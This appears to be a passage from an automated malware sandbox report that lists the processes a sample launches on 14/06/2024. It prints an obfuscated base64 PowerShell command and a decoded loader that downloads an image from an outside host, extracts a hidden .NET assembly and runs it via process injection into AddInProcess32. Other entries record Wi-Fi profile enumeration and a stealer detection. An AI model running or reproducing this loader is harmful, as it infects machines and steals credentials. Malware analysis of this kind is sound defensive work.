QQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBSDgTreHUDgTrebgBQDgTreEUDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBkDgTreHIDgTrebwB3DgTreHMDgTreLwDgTrexDgTreDcDgTreLgDgTre5DgTreDMDgTreLgDgTrezDgTreDIDgTreMQDgTreuDgTreDMDgTreOQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBcDgTreFwDgTredDgTreBzDgTreGMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreFwDgTreQwBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreIDgTreBGDgTreGkDgTrebDgTreBlDgTreHMDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreYQBiDgTreHUDgTrecgByDgTreGEDgTrecgDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          Imagebase:0x7ff6cb6b0000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:4
          Start time:09:15:01
          Start date:14/06/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6ee680000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:5
          Start time:09:15:02
          Start date:14/06/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
          Imagebase:0x7ff6cb6b0000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:6
          Start time:09:15:12
          Start date:14/06/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"
          Imagebase:0x7ff7a9af0000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:7
          Start time:09:15:12
          Start date:14/06/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6ee680000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:9
          Start time:09:15:15
          Start date:14/06/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0xcd0000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          Reputation:moderate
          Has exited:true

          General

          Target ID:12
          Start time:09:15:23
          Start date:14/06/2024
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Imagebase:0xa40000
          File size:236'544 bytes
          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:13
          Start time:09:15:23
          Start date:14/06/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6ee680000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:14
          Start time:09:15:23
          Start date:14/06/2024
          Path:C:\Windows\System32\msiexec.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\msiexec.exe /V
          Imagebase:0x7ff63cc90000
          File size:69'632 bytes
          MD5 hash:E5DA170027542E25EDE42FC54C929077
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:15
          Start time:09:15:23
          Start date:14/06/2024
          Path:C:\Windows\SysWOW64\chcp.com
          Wow64 process (32bit):true
          Commandline:chcp 65001
          Imagebase:0x230000
          File size:12'800 bytes
          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          General

          Target ID:16
          Start time:09:15:24
          Start date:14/06/2024
          Path:C:\Windows\SysWOW64\netsh.exe
          Wow64 process (32bit):true
          Commandline:netsh wlan show profile
          Imagebase:0x15c0000
          File size:82'432 bytes
          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:17
          Start time:09:15:25
          Start date:14/06/2024
          Path:C:\Windows\SysWOW64\findstr.exe
          Wow64 process (32bit):true
          Commandline:findstr All
          Imagebase:0xc30000
          File size:29'696 bytes
          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          Disassembly

          No disassembly